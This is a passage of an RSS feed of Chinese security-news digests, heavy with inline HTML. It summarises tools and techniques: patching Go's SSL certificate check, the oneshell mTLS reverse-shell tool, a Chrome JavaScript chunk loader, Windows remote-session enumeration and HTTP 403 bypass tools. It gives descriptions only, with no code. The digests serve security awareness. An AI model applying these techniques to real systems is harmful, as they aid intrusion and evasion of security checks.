monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">net/http</code> 库和 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">verifyServerCertificate</code> 函数的工作原理是关键，它使得定位并修改相关的程序集指令成为可能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">逆向工程和程序集级别的修改需要对程序的内部结构有一定的了解，但不需要深入的低级编程技能。</section></li></ul>
	<br/>
	<p>🏷️: Golang, SSL验证, 网络安全, HTTPS请求</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 统领一切的反向Shell工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了一种新的反向shell工具oneshell，旨在解决现有工具存在的问题，如依赖不同的系统环境、连接不安全等，提供了一种跨平台、安全的反向shell解决方案。</span>
		</p>
	</blockquote><section><video controls="" poster="https://wechat2rss.xlab.app/img-proxy/?k=168f6e5c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmf8HKsAOjMBqkaZeYOnBbgY2hpwISN3tRVDnSKZ9OHk81Q4YrO1RDc1Q6MkccD5iaprwzhwMYmS8A%2F0%3Fwx_fmt%3Djpeg" src="https://wechat2rss.xlab.app/video-proxy/?k=4c4267f0&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487535%26idx%3D1%26sn%3Df1ff1579aa1f7cdfaef7c8c4fa906493%26subscene%3D0&amp;v=wxv_3551241151267864577"></video></section><section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3WrhaGqU4mJ3zibGg557WCA5L24sl3wO0NtoJhM3XxHTyF5icBggD7LZw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3WrhaGqU4mJ3zibGg557WCA5L24sl3wO0NtoJhM3XxHTyF5icBggD7LZw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844215481152128"></mp-common-miniprogram>
	</section><section><img class="rich_pages wxw-img" data-imgfileid="100003884" data-ratio="0.6022304832713755" data-w="1076" src="https://wechat2rss.xlab.app/img-proxy/?k=70856402&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmf8HKsAOjMBqkaZeYOnBbgY2hpwISN3tRVDnSKZ9OHk81Q4YrO1RDc1Q6MkccD5iaprwzhwMYmS8A%2F640%3Fwx_fmt%3Djpeg%26quot"/></section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">跨平台兼容性：oneshell的设计目标是创建一个在大多数系统上都能工作的payload，减少攻击者在建立连接时需要尝试的payload数量。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">连接安全性：使用Mutual TLS（MTLS）来确保数据传输的安全性，防止中间人攻击和数据泄露。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">简化依赖：通过创建一个极小的ELF文件，避免了对系统中的curl、wget等工具的依赖，使得payload更加通用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">数据完整性：采用Treyfer算法实现CBC-MAC，以确保下载的二进制文件未被篡改。</section></li></ul>
	<br/>
	<p>🏷️: 反向shell, 网络安全, 跨平台, 安全解决方案</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 Chunk Loader：动态加载JavaScript文件的Chrome扩展</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Chunk Loader 是一款 Chrome 扩展程序，用于从指定的 URL 加载和导入 JavaScript 分块文件，对于需要基于主脚本动态加载多个 JavaScript 文件的开发者来说非常有用。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbgmjcibia0CPtcuOREpD5tx02JFJ8b9Pn1ibJPZ1XmB2vkXIE5xcXZElthw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbgmjcibia0CPtcuOREpD5tx02JFJ8b9Pn1ibJPZ1XmB2vkXIE5xcXZElthw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844215814148288"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Chunk Loader 提供了一种高效的方式来动态加载和导入 JavaScript 分块文件，这对于前端开发和调试非常重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该扩展程序支持自定义分块文件的基路径和文件扩展名，增加了灵活性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安装和使用 Chunk Loader 的过程被详细记录在网页上，便于开发者遵循。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">项目鼓励社区参与，通过开源贡献来改进和完善该工具。</section></li></ul>
	<br/>
	<p>🏷️: Chrome扩展, JavaScript, 开发者工具</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=991c0b7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3nwksKq8ZBqrghjtia9TYiblaxU2VXrUpDcAM57Ric0wX9pBg69IusWVyg%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487535">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4874f7f2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487535%26idx%3D1%26sn%3Df1ff1579aa1f7cdfaef7c8c4fa906493%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 18 Jul 2024 08:43:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」2024-07-17</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487441&amp;idx=1&amp;sn=fb0f6a6a153e122770ac44383f8699a9</link>
      <description>&#xA;&#x9;&#xA;&#x9;&#x9;2024-07-17&amp;nbsp;安全「信息差」每天快人一步&#xA;&#x9;&#xA;&#x9;&#x9;&#xA;&#x9;&#x9;&#xA;&#x9;&#x9;&#x9;1. 推送「新、</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-17 08:26</span> <span style="display: inline-block;">北京</span>
</p>

<p></p>
<p>	</p>
<p>		2024-07-17 安全「信息差」每天快人一步</p>
<p>	</p>
<p>		</p>
<p>		</p>
<p>			1. 推送「新、</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=362d8587&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3rCtRic9S4tqpClRa0FqBiaLWSibibP6RtLDKbdan7ZfHLQZPzNQPq4YKibw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-17 安全「信息差」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;">
		<span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送「新、热、赞」，降噪增效<br/></p>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			2. 查漏补缺，你可能错过了一些小东西</p>
	</blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 通过未公开的Windows API进行远程会话枚举</span></h3>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card mp_common_widget" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXJJW775GEs8v7Gx6hhDibrL9797wXhMOBcptK6ibfbbEngzTsEAe3xW4A/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXJJW775GEs8v7Gx6hhDibrL9797wXhMOBcptK6ibfbbEngzTsEAe3xW4A/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855418155541552"></mp-common-miniprogram>
	</section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 常见HTTP 403错误绕过工具介绍第二部分</span></h3>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card mp_common_widget" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXqsmEdibwhHfL2EK9wkqklbYYtXDjZ3bjjcXBBzq5jjDBv6icyPUtrS6Q/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZl3sr69R3RNdcS6v0nMIWuXqsmEdibwhHfL2EK9wkqklbYYtXDjZ3bjjcXBBzq5jjDBv6icyPUtrS6Q/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522185828851522"></mp-common-miniprogram>
